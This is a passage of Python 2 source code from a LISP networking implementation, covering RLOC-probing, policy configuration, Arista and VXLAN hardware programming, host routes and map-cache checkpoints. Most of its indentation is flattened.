rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probing
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
        # same RLOC address but different translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
            # Suppress sending RLOC-probe if we just received a nonce-echo
            # in the last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
            astr = red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
        # Reinstall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
    # Check if the RTR address is in the RTR-list the lisp-itr process
    # learned from the map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_addr, source, port, nonce, hop_count,
ttl):
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc_addr.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}".format(probe,
red(map_reply_addr, False), red(source_addr, False)))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr and rloc.translated_port != 0 and
rloc.translated_port != port): continue
rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
    #endfor
return(count)
#enddef
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
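#
# Illustrative example: lisp_format_macs("0050b6a857df", "005056c00008")
# returns "0050-b6a8-57df -> 0050-56c0-0008".
#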
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
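#
# Illustrative counterpart sketch (hypothetical name): an AFI=17
# distinguished-name is encoded as the name bytes followed by a null
# terminator, which is exactly what the decoder above consumes. The decoder
# above bounds names to under 255 bytes.
#
def example_encode_dist_name(name):
    return(name + "\0")
#enddef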
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of four-element entries whose
# last element is a lisp_packet. This function is called and run in its own
# thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
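#
# Illustrative kv_pair for lisp_policy_command(), with hypothetical values.
# Each match keyword maps to an array with one value per match clause, and
# the "datetime-range" array length determines the number of match clauses:
#
#   kv_pair = { "policy-name" : "policy1", "datetime-range" : [ "" ],
#               "instance-id" : [ "1000" ], "source-eid" : [ "10.0.0.0/8" ],
#               "set-action" : "drop" }
#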
#
# lisp_send_to_arista
#
# Send supplied CLI command to an Arista switch, via its FastCli interface,
# so the hardware can be configured.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above points to this subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
    # Get a unique next-hop IP address on vlan4094's subnet. It is used as a
    # handle to get the VTEP's MAC address, and that MAC address in turn
    # tells VXLAN to encapsulate the IP packet (with frame header) to the
    # VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
    # Derive a MAC address from the VTEP address and associate it with the
    # next-hop address on vlan4094. This MAC address must be the MAC address
    # the foreign VTEP configured with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
    octet1 = lisp_hex_string(int(rloc_octets[1])).zfill(2)
    octet2 = lisp_hex_string(int(rloc_octets[2])).zfill(2)
    octet3 = lisp_hex_string(int(rloc_octets[3])).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is an RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT, so we have to data encapsulate it with a source port of
# 4341 and a destination address and port that were translated by the NAT.
# That information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
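    # The 28 bytes added below are the 20-byte IPv4 header plus the 8-byte
    # UDP header.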
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
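#
# Example (illustrative): a Linux default route line of
# "default via 192.168.1.1 dev eth0" is returned as [["eth0", "192.168.1.1"]].
#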
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
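#
# Example checkpoint entries (hypothetical EIDs and RLOCs):
#
#   [1000]10.1.0.0/16 rloc 1.1.1.1 1 50, 2.2.2.2 1 50
#   [1000]10.2.0.0/16 rloc native-forward
#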
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
